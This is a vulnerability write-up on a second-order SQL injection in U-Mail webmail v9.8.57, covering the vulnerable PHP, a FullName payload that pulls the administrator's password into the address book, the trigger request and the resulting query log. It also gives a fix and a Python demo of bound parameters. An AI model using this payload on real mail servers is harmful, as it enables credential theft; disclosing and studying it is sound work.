U-Mail system second-order SQL injection (3) (no restrictions; the administrator password can be obtained)
The second-order injection vulnerability in the U-Mail system can be used to read the administrator password directly.
Version: latest release, v9.8.57
Vulnerable file: /client/oab/module/operates.php. The relevant code:
```php
if (ACTION == "save-to-pab") {
    include_once(LIB_PATH . "pab.php");
    $PAB = PAB::getInstance();
    $maillist_id = gss($_GET['maillist']);
    if ($maillist_id) {
        $member_all = $Maillist->getMemberByMaillistID($maillist_id, "Mailbox, FullName", 0);
        if (!$member_all) {
            dump_json(array("status" => TRUE, "message" => ""));
        }
        foreach ($member_all as $member) {
            if (!$PAB->getContactByMail($user_id, $member['mailbox'], "contact_id", 0)) {
                $data = array(
                    "user_id"    => $user_id,
                    "fullname"   => $member['fullname'],   // second-order injection
                    "pref_email" => $member['mailbox'],
                    "updated"    => date("Y-m-d H:i:s"),
                );
                $res = $PAB->add_contact($data, 0);
                if (!$res) {
                    dump_json(array("status" => FALSE, "message" => el("An error occurred while adding a contact. Adding failed!", "")));
                }
            }
        }
    } else {
        $user_ids = gss($_GET['userlist']);
        $user_ids = id_list_filter($user_ids);   // WooYun-2014-72963
        if (!$user_ids) {
            dump_msg("param_error", el("parameter error!", ""));
        }
        $where   = "t1.UserID IN (" . $user_ids . ")";
        $arr_tmp = $Mailbox->getMailboxInfo($domain_id, $where, "", 0);
        $user_all = $arr_tmp['data'];
        if (!$user_all) {
            dump_json(array("status" => TRUE, "message" => ""));
        }
        foreach ($user_all as $user) {
            $qq = $msn = "";
            if (strpos($user['qqmsn'], "@")) {
                $msn = $user['qqmsn'];
            } else {
                $qq = $user['qqmsn'];
            }
            if (!$PAB->getContactByMail($user_id, $user['email'], "contact_id", 0)) {
                $data = array(
                    "user_id"    => $user_id,
                    "fullname"   => $user['fullname'],
                    "pref_email" => $user['email'],
                    "pref_tel"   => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
                    "birthday"   => $user['birthday'],
                    "im_qq"      => $qq,
                    "im_msn"     => $msn,
                    "updated"    => date("Y-m-d H:i:s"),
                );
                $res = $PAB->add_contact($data, 0);   // second-order injection
                if (!$res) {
                    dump_json(array("status" => FALSE, "message" => el("An error occurred while adding a contact. Adding failed!", "")));
                }
            }
        }
    }
    dump_json(array("status" => TRUE, "message" => ""));
}
```
The attack first gets a single quote into the database. In the personal profile (the FullName field, as the query log below shows), enter the following payload:
',`homepage`=(SELECT password from userlist where userid=2)#
Then invoke the vulnerable function. The request is:
http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test2
Now open the personal address book: the administrator password is shown there.
The SQL that is executed, as recorded in the MySQL general query log:
```
150227 11:43:30  8724 Connect   umail@localhost on
                 8724 Query     SET NAMES 'UTF8'
                 8724 Init DB   umail
                 8724 Query     UPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='13'
                 8724 Query     UPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='13'
                 8724 Quit
150227 11:46:10  8727 Connect   umail@localhost on
                 8727 Query     SET NAMES 'UTF8'
                 8727 Init DB   umail
                 8727 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 8727 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 8727 Query     SELECT contact_id FROM pab_contact WHERE user_id='13' AND pref_email='[email protected]' LIMIT 1
                 8727 Query     INSERT INTO pab_contact SET `user_id`='13',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='[email protected]',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-02-27 11:46:10'
                 8727 Quit
```
Fix:
Escape the values before they are written to the database. The first UPDATE does escape the quote, which is exactly why it lands in the table intact; the INSERT in add_contact then reuses the stored value without escaping it, so the value must be escaped (or bound as a parameter) at that second write as well.
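As an added example (not U-Mail's own code), the second-order flow above recreated in Python on an in-memory SQLite database: the profile write binds its value, so the quote is stored literally; the address-book insert then either concatenates the stored value (the vulnerable pattern, shown only as the SQL text it would produce) or binds it (the hardened form). The table names follow the query log; the schema, the placeholder passwords and the e-mail address are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the two U-Mail tables seen in the query log;
# the columns and the placeholder passwords are assumptions for this demo.
SCHEMA = """
CREATE TABLE userlist (UserID INTEGER PRIMARY KEY, Mailbox TEXT, FullName TEXT, password TEXT);
CREATE TABLE pab_contact (contact_id INTEGER PRIMARY KEY, user_id INTEGER,
                          fullname TEXT, pref_email TEXT);
INSERT INTO userlist VALUES (2, 'admin', 'Administrator', 'PLACEHOLDER-ADMIN-PASSWORD');
INSERT INTO userlist VALUES (13, 'test2', 'Test User', 'PLACEHOLDER-USER-PASSWORD');
"""

# The value the report enters in the personal profile (taken from the page).
PAYLOAD = "',`homepage`=(SELECT password from userlist where userid=2)#"


def save_profile(conn, user_id, fullname):
    """First-order write. The value is bound, so the quote is stored as a
    literal character; escaping at this step does not protect later reuse."""
    conn.execute("UPDATE userlist SET FullName = ? WHERE UserID = ?", (fullname, user_id))


def build_add_contact_unsafe(user_id, fullname, pref_email):
    """Vulnerable pattern, returned as text only: a value read back from
    userlist is concatenated into the INSERT as if it were trusted."""
    return ("INSERT INTO pab_contact SET `user_id`='%s',`fullname`='%s',`pref_email`='%s'"
            % (user_id, fullname, pref_email))


def add_contact_safe(conn, user_id, fullname, pref_email):
    """Hardened add_contact: every value is bound, including values that
    came out of the application's own database."""
    conn.execute("INSERT INTO pab_contact (user_id, fullname, pref_email) VALUES (?, ?, ?)",
                 (user_id, fullname, pref_email))


def run_demo():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    save_profile(conn, 13, PAYLOAD)
    # Second step of the flow: the profile is read back and reused as trusted data.
    (stored,) = conn.execute("SELECT FullName FROM userlist WHERE UserID = 13").fetchone()
    unsafe_sql = build_add_contact_unsafe(13, stored, "test2@example.invalid")
    add_contact_safe(conn, 13, stored, "test2@example.invalid")
    (contact_name,) = conn.execute("SELECT fullname FROM pab_contact WHERE user_id = 13").fetchone()
    return stored, unsafe_sql, contact_name


if __name__ == "__main__":
    stored, unsafe_sql, contact_name = run_demo()
    print("stored profile name :", stored)
    print("concatenated INSERT :", unsafe_sql)    # fullname closes early, `homepage`=(...) is injected
    print("bound INSERT stored :", contact_name)  # the whole payload, as an inert string
```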